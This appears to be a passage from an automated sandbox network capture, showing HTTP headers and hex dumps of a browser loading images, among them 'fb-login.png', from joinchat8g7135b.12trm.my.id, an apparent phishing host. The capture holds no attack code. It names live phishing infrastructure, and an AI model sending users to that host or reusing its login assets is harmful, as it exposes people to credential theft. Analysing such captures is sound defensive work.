                          ApiVersion: Distribute 1.1
                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                          Content-Type: application/octet-stream
                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                          Server: ECAcc (lpl/EF06)
                          X-CID: 11
                          X-Ms-ApiVersion: Distribute 1.2
                          X-Ms-Region: prod-weu-z1
                          Cache-Control: public, max-age=150020
                          Date: Mon, 27 May 2024 22:30:17 GMT
                          Content-Length: 55
                          Connection: close
                          X-CID: 2
                          2024-05-27 22:30:17 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          22192.168.2.449765188.114.97.34435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:17 UTC376OUTGET /vhsfhqpdhdsih6/img/01.jpg HTTP/1.1
                          Host: joinchat8g7135b.12trm.my.id
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:17 UTC679INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:17 GMT
                          Content-Type: image/jpeg
                          Content-Length: 6920
                          Connection: close
                          Last-Modified: Thu, 25 Aug 2022 05:06:54 GMT
                          Cache-Control: max-age=14400
                          CF-Cache-Status: HIT
                          Age: 5221
                          Accept-Ranges: bytes
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=74mU3l8WRPRSbbHNM7BCKt%2B%2BPhsLDCA344oH3QvIkSLT0K2gDaENrPdeRf53vaaTrx2%2FfpnITnbjRKNyNVikSo5y66boZFEplJkgr%2FW2csw%2BbnvOj6azoFht6LAKsIKxddQNtE9ngqomgnh80Mg%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972d62d357d14-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:17 UTC690INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 0a 07 08 15 16 15 18 15 15 15 18 18 18 18 1a 18 18 18 18 19 18 18 18 1a 12 18 18 18 1a 19 18 18 18 18 1c 21 2e 25 1c 1e 2b 1f 18 18 26 38 26 2b 2f 31 35 35 35 1a 24 3b 40 3b 33 3f 2e 34 35 31 01 0c 0c 0c 10 0f 10 1a 12 12 1a 34 21 1a 21 31 31 34 31 34 34 31 34 34 34 34 31 34 34 31 34 34 34 31 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 31 34 34 34 31 40 34 3f 34 31 34 34 3a 31 ff c0 00 11 08 00 e3 00 de 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 00 01 02 03 04 06 07 08 ff c4 00 40 10 00 02 01 02 04 03 05 05 06 04 05 03 05 00 00 00 01 02 00 03 11 04 12 21 31 05 41 51 06 22 61 71 91 13 32 81 a1 b1 07 42 52 72 c1 d1 62 82 e1
                          Data Ascii: JFIF!.%+&8&+/1555$;@;3?.4514!!11414414444144144414444444444444444414441@4?4144:1"@!1AQ"aq2BRrb
                          2024-05-27 22:30:17 UTC1369INData Raw: 0b 50 42 9f c2 c6 e2 00 e9 ea 57 88 41 5c 13 8e 52 c4 a6 7a 6d b6 8c bf 79 0f 8f 58 51 4c 28 04 e2 bc 6b c7 11 d0 a3 89 29 01 27 15 a2 0d 68 f1 45 19 32 0a 39 31 a3 c2 01 a3 c6 8f 00 0e 42 9d 32 d7 45 0a 48 73 70 46 52 8a 45 b3 f8 de 6e c0 25 89 52 f9 b2 00 a6 e3 50 d6 e4 66 4c 26 18 bb b1 04 0d b3 15 2c 09 e6 a4 37 35 f0 9d 1e 1b 0e 32 dc a8 be e6 dc ce d7 96 d5 61 af 96 f3 a4 59 87 1a 4b a3 a4 72 25 4d 99 19 03 2b ac 0e 53 94 d9 ac 6c 77 b1 b6 9a 4b 0c 6b 48 44 02 ec d7 18 7c 48 7c ea 14 a1 08 40 e6 d6 37 3e 10 6f 1b a9 7c 4d ae 06 55 40 a4 f5 25 b3 7c a5 bd 89 4b 1c 57 ff 00 79 1e 97 99 31 6c 1a b3 b9 5c d6 6b 2f 90 23 5b 78 18 c8 d3 c5 29 53 3c e7 87 16 7e 28 57 31 b2 d4 73 96 e7 4b 0d fe 73 d6 d0 7f 9f 7e 80 fd 2d 38 6e 03 84 4f f1 8e fa 17 67 73 70
                          Data Ascii: PBWA\RzmyXQL(k)'hE291B2EHspFREn%RPfL&,752aYKr%M+SlwKkHD|H|@7>o|MU@%|KWy1l\k/#[x)S<~(W1sKs~-8nOgsp
                          2024-05-27 22:30:17 UTC1369INData Raw: 23 3d a4 8f a2 f8 01 ff 00 4d 40 ff 00 f1 27 cd 04 23 78 3f 84 a6 5a 34 87 e1 a6 83 d1 00 fd 26 e0 d7 97 a1 09 83 1e 42 f2 41 a2 e8 30 78 a2 02 38 8e 98 a3 5e 49 4c 89 8a 12 16 5e 44 98 c2 28 18 30 13 85 c4 78 4d 75 cf 76 06 a5 5b 9d ad e7 34 e2 6b 59 47 49 7b 93 5d 71 bd 34 ab 39 27 2d 87 bb 70 75 23 c4 fa 41 f5 96 d5 8d c2 e5 28 4b 0d 01 62 08 b2 81 cc 6a 77 9a 30 d8 92 e8 48 20 01 a1 be fb 6f e9 04 3b 53 cf 9c 66 a9 50 66 ca bb 82 00 20 12 00 b5 b7 b4 12 85 99 f7 a5 85 19 2a 3b d3 2d 95 d9 0b 87 70 11 7b b9 3b 9a 77 4e 51 b7 39 9f 88 d5 47 aa 00 00 64 57 4b 81 97 2a fb a4 16 3c ad 7d 37 30 8a 3a 37 74 83 c8 bf 3d 6d 75 ee fe 9c ad 28 c3 d5 46 2e c7 2b 66 70 4d c3 1d 2c ca bb 0d 08 08 4f f3 18 71 0c ba ec af d9 a9 a6 e8 84 2b 95 5b 5c f7 ac bf 78 6b ae
                          Data Ascii: #=M@'#x?Z4&BA0x8^IL^D(0xMuv[4kYGI{]q49'-pu#A(Kbjw0H o;SfPf *;-p{;wNQ9GdWK*<}70:7t=mu(F.+fpM,Oq+[\xk
                          2024-05-27 22:30:17 UTC1369INData Raw: cf 88 a0 ae 74 40 f5 9b c9 56 cb 71 e7 3c d7 8e 63 9a bd 47 ab c9 bb aa 3a 28 da 75 1d ab c6 94 7a d9 49 d5 52 98 d7 5b 6e d3 8b 3a 69 d0 7a c9 c1 3d 69 9f 9a bf 0a f0 e9 de 03 a7 d6 7a 37 66 bb 24 59 05 57 5f e5 3a 1f cd e5 32 7d 9e 70 04 76 f6 d5 05 d4 7b a0 ec cd ce fe 02 7a c2 28 d3 e5 6d 2d 25 f3 63 c4 24 ac 47 31 4f 81 86 7a 64 00 12 9e 63 6e ad 6b 29 f8 6b eb 0e 51 c2 28 e5 36 b5 01 fd 63 84 8f 1c d2 ff 00 f4 3e 44 1a 82 da d6 80 b8 c7 03 0e a4 f8 6f d3 e1 3a 30 b2 38 94 ba 30 f0 3f 49 a1 39 a4 2f 93 3c 23 8d 87 72 0d 54 d0 13 95 d4 58 d8 68 33 7e 23 a7 84 15 4a 91 37 2a 2f f7 58 6c 1f 98 b7 e1 6f ac f6 2c 5e 0d 32 ea 96 b9 b1 cc 2c 2f d4 48 f0 de cd 51 2f 9c 28 2a ea c9 58 1f 76 a0 3a ab 29 e4 c0 da c6 25 52 91 33 f5 9c 27 64 f8 af b1 7c d7 3a 80
                          Data Ascii: t@Vq<cG:(uzIR[n:iz=iz7f$YW_:2}pv{z(m-%c$G1Ozdcnk)kQ(6c>Do:080?I9/<#rTXh3~#J7*/Xlo,^2,/HQ/(*Xv:)%R3'd|:
                          2024-05-27 22:30:17 UTC1369INData Raw: 76 38 bb 58 6d cc cc 2a d6 4a 96 d8 29 ff 00 a8 4a ea bd c5 ba 46 0f 74 71 7b 5c 01 f3 95 af e8 d5 c9 c4 a6 00 2a 6e 5b e3 68 4f 06 bd e4 6e 88 01 f9 cc 9e cf 5c bd 1c 83 e1 99 41 06 16 c0 52 b3 65 3a 58 5b 5e 7c c7 d6 3f 27 a3 07 14 f6 18 c2 b6 5b 11 ce 12 a1 89 3c e0 8a 49 65 b7 42 26 f4 60 27 3e fd 9a f0 37 43 15 08 61 f1 9a 4e 7e 89 d6 e0 13 08 52 46 e8 62 36 25 2c 0a ff 00 8a 8f fe 22 65 a5 41 8f 29 a0 61 4c 02 b6 87 6c 41 95 b6 28 c9 b6 19 ba 4c 95 68 91 f3 93 7f 00 68 5c 55 cc cf c7 3b 46 30 e9 95 08 35 9c 11 4d 46 b9 7a bb 81 b0 1f 38 07 1b c6 d1 03 15 6b e5 e7 be 63 f8 54 73 24 cc 1d 9c c1 35 4a a7 13 5b 52 e4 31 5f e1 1e ea f9 4d 5c 1c 5f b4 57 48 ee 3b 37 49 e9 61 d0 13 76 61 9d f3 6e 5d ce 66 bf 8e b0 d0 c5 75 03 e0 60 75 c5 08 9f 18 3a ce 82
                          Data Ascii: v8Xm*J)JFtq{\*n[hOn\ARe:X[^|?'[<IeB&`'>7CaN~RFb6%,"eA)aLlA(Lhh\U;F05MFz8kcTs$5J[R1_M\_WH;7Iavan]fu`u:
                          2024-05-27 22:30:17 UTC754INData Raw: 01 55 1e dd e2 8e 36 b1 ef 1f fb 84 29 ed 5b 67 5c f6 fb eb a1 1e 6b ce 61 a7 e4 f4 c5 74 f4 d4 94 f9 a9 b1 f9 1f 84 90 ab 63 67 16 3d 46 c7 f6 91 56 16 b8 37 eb 6d c7 98 88 90 46 ba 8f a4 42 97 d9 78 4b ed 11 49 98 ad bd d3 fd 3c c4 9a bb f5 06 40 e1 61 a6 3a 49 aa db 62 65 42 b9 e6 84 78 8d 64 d2 aa 9f bc 3c b6 84 56 5c 0c 98 69 55 e3 03 0e 8a d1 a4 ea 08 ea 08 81 bd 99 04 83 cb 43 0b a3 c1 f8 b1 df 62 26 cf 8b 5e d1 5b e8 7e 52 d5 51 20 bb 4b 94 4d 80 10 11 c4 63 1c 08 52 03 18 c9 05 8a d1 c4 6c 01 21 14 51 47 49 00 71 25 69 00 d2 41 a4 c2 1e 6b 45 f5 60 a7 de 5b 9f 13 ce fe 31 f1 6d 99 41 25 b4 de ec 6f f0 e9 32 60 b7 3e 36 b4 bb 10 0d ac 79 f3 88 cf 4e a1 26 42 8e 88 41 39 95 49 20 11 f1 de 0b a9 58 96 24 9d fe 86 6c ac c0 26 9a 7e b0 53 ca 69 85 ca
                          Data Ascii: U6)[g\katcg=FV7mFBxKI<@a:IbeBxd<V\iUCb&^[~RQ KMcRl!QGIq%iAkE`[1mA%o2`>6yN&BA9I X$l&~Si


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          23192.168.2.449767188.114.97.34435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:17 UTC382OUTGET /vhsfhqpdhdsih6/img/fb-login.png HTTP/1.1
                          Host: joinchat8g7135b.12trm.my.id
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:17 UTC671INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:17 GMT
                          Content-Type: image/png
                          Content-Length: 31218
                          Connection: close
                          Last-Modified: Sun, 31 Oct 2021 01:09:16 GMT
                          Cache-Control: max-age=14400
                          CF-Cache-Status: HIT
                          Age: 5221
                          Accept-Ranges: bytes
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4cnshgvoC0pH8TGiF851aylMVq3weCXYwTyWEvkUyLrQwmNMWNQwWFQ3zA5OJiyolz9R4W4et7qNXwbx2vCCKzaI2Vb8o%2BKCYn2Gvx9yr3wcwPnQNDIUhfKZq7GsHyAkqjNw5RcOMyY35C9gKs8%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972d63a6143ee-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:17 UTC698INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 06 74 00 00 01 9b 08 06 00 00 00 fd 4a 7e 87 00 00 00 20 63 48 52 4d 00 00 7a 25 00 00 80 83 00 00 f9 ff 00 00 80 e9 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 6f 92 5f c5 46 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 79 78 49 44 41 54 78 5e ed dd 07 d8 2d 55 79 f7 7f f8 d3 8b 28 58 10 51 14 0b 88 28 62 05 7b 6f 58 b0 60 01 5b 14 8d b1 61 4b 8c d8 8d be 6a 54 8c b1 c6 de 5b d4 58 b1 97 a8 58 b0 f7 0e 28 2a 82 1d 14 a9 72 fe f7 77 af d9 e1 70 ce 79 9e 67 3f fb d9 33 b3 66 ee ef e7 ba 7e d7 5a fb 24 6f 5e 3d 67 cf 9e 99 75 af b2 f9 ba 75 eb 36 93 24 49 92 24 49 92 24 49 52 bd fe bf a6 95 24 49 92 24 49 92 24 49 52 a5 2c e8 48 92 24 49 92 24 49 92 24 55 ce 82 8e 24 49 92 24 49
                          Data Ascii: PNGIHDRtJ~ cHRMz%u0`:o_FpHYsyxIDATx^-Uy(XQ(b{oX`[aKjT[XX(*rwpyg?3f~Z$o^=guu6$I$I$IR$I$I$IR,H$I$I$U$I$I
                          2024-05-27 22:30:17 UTC1369INData Raw: 82 8e 24 49 92 24 49 92 24 49 52 e5 2c e8 48 92 24 49 92 24 49 92 24 55 ce 82 8e 24 49 92 24 49 92 24 49 52 e5 36 5f b7 6e 5d d3 55 32 17 8b ec 1c d9 25 b2 23 7f 10 b6 8a f0 e7 5b 44 ce 6e da 33 23 7f 8a 80 ff f9 19 11 3e 9f 1b 39 27 c2 ff fc d4 c8 69 11 49 92 24 49 92 24 49 92 d4 02 0b 3a e3 72 a5 c8 5e 91 fd 22 97 8f ec 11 b9 68 64 a7 08 45 9b 2d 23 ac ca 3a af 69 f9 9f 2d c2 1f 22 fc df 5c 1f 5f 2c 8a 3d 14 80 fe 16 f9 4b e4 cf 91 df 46 7e 1f 39 ae f9 fc cb c8 49 4d 2b 49 92 24 75 85 67 64 9e 9f f7 8c 5c b6 69 99 ec b4 7b 84 49 4e db 37 7f 26 49 92 24 ad 16 cf 92 57 8b ec 16 b9 42 e4 32 4d ff e2 11 9e 35 19 ab bd 6e 84 71 52 69 66 16 74 86 89 82 cd 6d 23 fc 28 50 c0 e1 a5 73 db 08 45 15 7e 14 86 e6 77 11 be 88 9b 47 58 19 c4 6a 9f 93 23 27 44 7e 1c f9
                          Data Ascii: $I$I$IR,H$I$I$U$I$I$IR6_n]U2%#[Dn3#>9'iI$I$I:r^"hdE-#:i-"\_,=KF~9IM+I$ugd\i{IN7&I$WB2M5nqRiftm#(PsE~wGXj#'D~
                          2024-05-27 22:30:17 UTC1369INData Raw: 99 0b 3a 47 44 b6 2a 5d 49 92 24 49 92 24 49 92 a4 7a 65 2e e8 dc 2f e2 76 6b 92 24 49 92 24 49 92 24 a9 7a 99 0b 3a 7b 34 ad 24 49 92 24 49 92 24 49 52 d5 b2 16 74 1e 12 c9 7e 7e 90 24 49 92 24 49 92 24 49 1a 88 ac 45 8d c3 22 6e b7 26 49 92 24 49 92 24 49 92 06 21 6b 41 67 af a6 95 24 49 92 24 49 92 24 49 aa 5e c6 82 ce 7e 91 ad 4b 57 92 24 49 92 24 49 92 24 a9 7e 19 0b 3a 0f 8c ec 52 ba 92 24 49 92 24 49 92 24 49 f5 cb 58 d0 b9 61 d3 4a 92 24 49 92 24 49 92 24 0d c2 e6 eb d6 ad 6b ba 69 9c 12 b9 44 e9 6a 06 7f 68 5a 9c d9 e4 ec c8 b9 4d ce 8b b4 81 62 e3 f4 ff f6 39 91 eb 95 ae 24 49 92 7a f2 db c8 c5 4b 37 05 9e 83 2f 56 ba 92 24 49 6a d9 4f 22 57 2a dd 34 f6 88 fc b2 74 a5 d9 64 2b e8 ec 1a f9 41 c4 2d d7 36 ed 77 91 bf 47 7e 16 f9 6a e4 1b 91 4f 44
                          Data Ascii: :GD*]I$I$Ize./vk$I$I$z:{4$I$I$IRt~~$I$I$IE"n&I$I$I!kAg$I$I$I^~KW$I$I$~:R$I$I$IXaJ$I$I$kiDjhZMb9$IzK7/V$IjO"W*4td+A-6wG~jOD
                          2024-05-27 22:30:17 UTC1369INData Raw: 60 d0 ec fa 91 7d 23 57 89 5c 3a b2 5b 84 97 f5 e9 00 db fa ab f1 2e da b4 1b 62 d0 62 fd 17 11 5e 52 fe 14 e1 e5 fe e4 c8 cf 22 9f 8b 7c 36 22 69 ed b8 36 af 15 e1 81 f5 32 11 1e e4 2e 19 61 90 8d 41 03 ae df 6d 9a 30 90 c0 0d 7b f3 08 83 07 b3 0e a8 fe 31 32 1d 6c e0 77 80 6b 9c 81 3a 06 d3 79 21 e2 7f ce 00 ed af 23 3c 44 9e 14 f9 7c 84 eb 5e 79 4d bf 9b 57 8e f0 bd 24 bb 47 2e 12 d9 25 c2 20 f0 d6 11 be 97 53 7c bf 96 ba bf 6c 88 fb 0d a6 f7 9c 69 81 87 f0 7d 9c 7e 27 b9 ef 7c 3f f2 8d 88 05 a0 3a 58 d0 a9 1f cf 82 3c 17 5e 35 b2 57 e4 12 11 ae dd 0b 45 b8 87 4c 2d f7 ef 38 7d 26 e4 ba e6 1e 32 bd 3e 7f 1f e1 99 f0 a7 11 ae cd 2f 47 4e 88 48 43 b0 73 84 fb 14 ef 49 5c 17 3c 73 11 fa 3c 73 f1 3f 5f ff 9d 69 7a 8f bb 75 d3 2e e7 23 11 fe f7 b9 5e 18 8c
                          Data Ascii: `}#W\:[.bb^R"|6"i62.aAm0{12lwk:y!#<D|^yMW$G.% S|li}~'|?:X<^5WEL-8}&2>/GNHCsI\<s<s?_izu.#^
                          2024-05-27 22:30:17 UTC1369INData Raw: 4e 8b 61 41 67 dc 78 7f 7d 6a 24 eb ef 0c f7 ec 17 44 18 17 5d 13 0b 3a aa dd c9 11 0e d9 1b 93 e7 47 98 e5 bf 75 24 e3 e0 30 3f 60 e4 f1 91 a3 f9 83 0e 64 29 e8 fc 2a c2 56 7d 9a 1f e7 13 3c 23 c2 76 1e be d0 b4 83 01 3c b6 67 e3 e5 c7 d9 d9 ab 37 2d e2 5c 61 f2 c9 ef e8 bc f8 1e f2 0c fb de 08 85 5b cd c6 82 4e 3b d8 3a 8a 42 0e 67 81 20 db f3 21 cf 85 e0 1c 2c 9e 0f 39 a3 4d b9 dc 36 f2 cf 11 0e 56 e7 1d c9 7b db 7c f8 cd 62 16 30 cf 56 6f 8a 78 7e 95 96 42 b1 94 22 0e db a9 f9 ce b3 36 14 77 d8 89 80 95 a7 1f 88 30 86 a5 f9 59 d0 19 37 c6 ac d8 85 29 2b ce e7 da bf 74 d7 c6 82 8e 6a f7 e3 c8 95 4b 77 d0 78 60 7a 57 84 c3 03 99 45 ed 4c b3 f2 c2 71 52 84 17 77 0e 55 6f 93 05 1d ad 84 41 72 66 84 f2 70 e1 f5 d9 1d 06 f1 d8 16 8b d9 d9 ce 28 5d 1a 03 5d
                          Data Ascii: NaAgx}j$D]:Gu$0?`d)*V}<#v<g7-\a[N;:Bg !,9M6V{|b0Vox~B"6w0Y7)+tjKwx`zWELqRwUoArfp(]]
                          2024-05-27 22:30:17 UTC1369INData Raw: 77 44 2e 15 f1 be 34 4e fc 1e 3c 21 c2 81 e2 43 b4 5f e4 7f 22 3b 45 7c e9 1e 36 be 8b 1c 6e c9 2a d2 73 f9 83 24 5c a1 33 1b fe df 7c 35 72 a1 88 f7 a3 76 fd 31 c2 36 16 99 57 ce d5 80 33 e0 28 78 fb 7d 1f 07 ae 2b 0a 3b 77 6c 5a d5 e7 ce 91 ff 88 f0 4c e9 b9 54 e3 70 74 e4 f5 11 56 ca 65 e6 0a 9d f1 60 e2 0d c7 51 64 c4 7d 94 05 0a 8b d8 71 68 93 5c a1 a3 9a 6d d1 b4 35 62 49 b3 c5 9c 6e f0 62 c8 2a 0b 96 24 33 cb 55 da 14 ce 20 61 bf e8 ab 45 1c 4c 18 af f3 22 43 2d e6 b0 b2 88 b3 80 38 6c df 62 ce f0 f1 3b 73 60 84 65 f4 f7 e7 0f a4 06 e7 16 70 80 3f 33 12 bd 1f b5 8f 81 cc 6b 47 d8 82 8d 7d da d5 2d 66 df 32 a1 88 7f 03 bf ef e3 31 3d c7 90 c9 74 ac 00 51 5d 3e 1b e1 79 98 fb 8c c5 9c f1 b8 7d e4 f0 c8 ab 23 99 57 35 68 1c 98 e8 c1 59 b1 59 9d 1d 69
                          Data Ascii: wD.4N<!C_";E|6n*s$\3|5rv16W3(x}+;wlZLTptVe`Qd}qh\m5bInb*$3U aEL"C-8lb;s`ep?3kG}-f21=tQ]>y}#W5hYYi
                          2024-05-27 22:30:17 UTC1369INData Raw: e1 59 91 95 04 ae 98 5b 99 2b 04 b4 5a 5c 5f 3c 0f 9d 10 b9 12 7f a0 55 e1 dc de 37 45 d8 4e 5c 9a 15 e7 9a 1d 14 71 d2 90 fa 74 fb 08 cf 57 59 c7 50 ff 18 79 7a e9 76 cb 82 8e 6a 75 5e d3 76 ed 3d 11 1f a4 86 89 1b c8 eb 4a 77 23 99 67 0b 0c d1 73 22 6c 79 98 f5 a1 40 17 74 56 e4 3b a5 5b 0d 8a 39 df 8a ec 3e f9 24 ad 8c df b3 5b 46 5c 4d 3a 7c af 8e 78 7f 1a 26 fe dd ae 17 e1 39 43 9b c6 0e 09 fc 3d 59 cc d1 3c 58 5d c2 61 fe 16 75 66 c7 b9 13 4f 8a 78 5f d1 3c b8 e6 98 94 fc b1 c9 27 a9 7b 2f 89 64 fe fd e2 b9 e9 35 a5 db 2d 0b 3a aa 15 03 78 5d e3 d0 f5 6d 4b 57 03 c5 5e f6 ef 2d dd 0b f0 b7 6e 38 38 7c f7 f0 88 2f 35 9a fa 72 d3 d6 82 62 0e e7 76 59 fc d7 6a b1 75 11 cb f1 9f 32 f9 a4 21 62 c0 64 9b d2 d5 40 f1 7c c1 73 06 33 4a 75 41 ac 3a f5 cc 42
                          Data Ascii: Y[+Z\_<U7EN\qtWYPyzvju^v=Jw#gs"ly@tV;[9>$[F\M:|x&9C=Y<X]aufOx_<'{/d5-:x]mKW^-n88|/5rbvYju2!bd@|s3JuA:B
                          2024-05-27 22:30:17 UTC1369INData Raw: e9 d6 c3 82 8e 6a f4 a7 a6 5d 34 66 24 f8 12 23 f5 87 17 b7 8b 95 ae b4 a4 df 45 8e 2a dd 5e 50 f8 f7 5e a1 be ec 1d b9 7d e9 4a ea 01 83 5e cf 2b dd 51 f9 b7 88 13 15 54 0b be 8b 4c a0 19 63 f1 74 8a b3 26 7c 9e 54 4d 28 2e 7e b1 74 a5 99 3d 2e c2 ce 15 59 b1 73 c8 ad 4a b7 2e 16 74 54 23 0e 9b 6a c3 bf 44 7c a8 92 fa c1 76 87 37 8b 38 98 a0 95 9c 16 69 f3 1c b5 e5 50 74 bc 48 e9 4a bd e0 39 85 03 cb 25 f5 87 fb 40 75 5b 6b ac 01 e7 e6 8c fd 6c 20 0d 0f ef 04 63 bd df f1 de 73 b7 88 63 0f aa cd a5 23 14 1b a5 59 fd 73 24 eb 6f d9 6f 23 6f 8f 30 3e 51 1d 0b 3a aa d1 2f 9a 76 91 b8 69 6d 57 ba 92 7a f0 a6 88 2f 35 9a c5 47 9b b6 6b 57 8a 58 74 54 0d d8 8a e6 29 a5 2b a9 07 3c af dc bf 74 07 8f 1d 0a 18 c0 f3 19 4c 35 e2 fd 7c 8c 87 b5 bf 21 e2 35 a7 1a f1
                          Data Ascii: j]4f$#E*^P^}J^+QTLct&|TM(.~t=.YsJ.tT#jD|v78iPtHJ9%@u[kl csc#Ys$oo#o0>Q:/vimWz/5GkWXtT)+<tL5|!5
                          2024-05-27 22:30:17 UTC1369INData Raw: fe a6 d7 19 ef 3d 8c 85 f0 4c c5 f9 29 5c 87 be f7 ac 0d f7 3c b6 c3 9d fe 3b d4 ee 85 11 56 36 3b 26 36 bf 8f 44 78 0f 61 6c 81 d5 d9 5c 6f 5c 7b dc e7 40 4b a1 9a 70 cf e3 5e c7 8a a8 e9 aa 28 fe df de ba 74 35 a7 ef 46 f6 2b dd de 71 8e e6 95 4a 37 8d 3d 22 bc d7 f7 89 df 5c ce 3f ce fa 9c cf 56 6b 6c 33 3e 18 16 74 54 9b a3 23 8b 38 7c f4 d3 91 9b 95 ae 56 89 87 68 7e 18 7e 16 f9 5a 84 22 db b1 11 6e ac f3 b8 56 84 7f 8b 5b 45 58 42 cf 0b 90 33 98 da 51 4b 41 87 2d 9b 78 18 d0 fc 18 3c a0 28 c3 99 25 5c 7f 3c 60 7d 34 d2 f6 ca 04 ce 2c b9 71 e4 3a 11 ae 57 06 27 18 ac 60 60 b0 cd 7b fd 31 91 1b 95 6e 67 4e 8a 50 10 c8 8a ef 12 03 53 4c 80 f8 3a 7f 30 40 ac 24 ba 7e 24 c3 3d 85 62 ce 2d 4b b7 57 16 74 da c3 8b 3c cf 5f fc 36 7d 35 f2 f9 c8 17 23 14 75
                          Data Ascii: =L)\<;V6;&6Dxal\o\{@Kp^(t5F+qJ7="\?Vkl3>tT#8|Vh~~Z"nV[EXB3QKA-x<(%\<`}4,q:W'``{1ngNPSL:0@$~$=b-KWt<_6}5#u
                          2024-05-27 22:30:17 UTC1369INData Raw: 93 1a fe 8d b0 fe 7f 16 be 3b 3c 14 fd 6d f2 69 3e ef 8c f0 b2 ac 0b e2 fb c0 43 27 e7 5f 0c 01 87 f6 7e 33 c2 4c 43 67 ac cd ae ef 82 8e 03 7d 4b e3 1a fc 4b 84 6d 3e 58 1d 92 05 33 e0 28 d8 f0 db c3 6f fd 86 83 4d 0c 50 5f 2e b2 96 df fd d5 ca fa 3d 65 10 99 bf eb b1 a3 60 b7 77 64 ac cf 7d 9c 35 d5 e7 1e cf fe ce af 1e c5 1c 66 29 73 d6 c2 50 30 28 c7 76 9a 16 75 36 56 c3 60 d7 86 be 1f 19 73 b1 7e b5 58 8d ca 99 84 ff 18 61 b2 d1 10 b0 3a ee ab 91 dd 22 16 76 ce c7 3d 67 d7 d2 ad 0a 5b 0e bf 25 62 11 f5 7c ac ca e1 de c1 ca b3 a1 60 22 22 5b 48 73 be 95 ce 47 91 99 f3 f6 fa 62 41 a7 1b ac ce 26 59 7f c7 6a 38 ae 60 4d 16 51 d0 19 82 8c 55 c7 9b 46 6a 9e 15 d1 16 f7 b1 dd 18 2b 73 5e 1f e1 00 f0 a1 79 6d 84 19 6b 9e ad 33 9b 3e 6f 4a 6c 3b f0 b8 88 2f
                          Data Ascii: ;<mi>C'_~3LCg}KKm>X3(oMP_.=e`wd}5f)sP0(vu6V`s~Xa:"v=g[%b|`""[HsGbA&Yj8`MQUFj+s^ymk3>oJl;/


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          24192.168.2.449768185.199.110.1334435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:17 UTC414OUTGET /assets/398893/15136779/4e765036-1639-11e6-9201-67e728e86f39.jpg HTTP/1.1
                          Host: cloud.githubusercontent.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:17 UTC585INHTTP/1.1 200 OK
                          Connection: close
                          Content-Length: 224922
                          x-amz-replication-status: COMPLETED
                          Last-Modified: Tue, 10 May 2016 05:56:48 GMT
                          ETag: "f9cebf245b82051cf1e25a5c190de77d"
                          Cache-Control: max-age=2592000
                          x-amz-version-id: null
                          Content-Type: image/jpeg
                          Accept-Ranges: bytes
                          Age: 57117
                          Date: Mon, 27 May 2024 22:30:17 GMT
                          Via: 1.1 varnish
                          X-Served-By: cache-ewr18171-EWR
                          X-Cache: HIT
                          X-Cache-Hits: 0
                          X-Timer: S1716849017.362036,VS0,VE1
                          X-Fastly-Request-ID: c5bd6bdc4d7415089a79559165e8d7e878f4053c
                          Server: GitHub Cloud
                          Timing-Allow-Origin: https://github.com
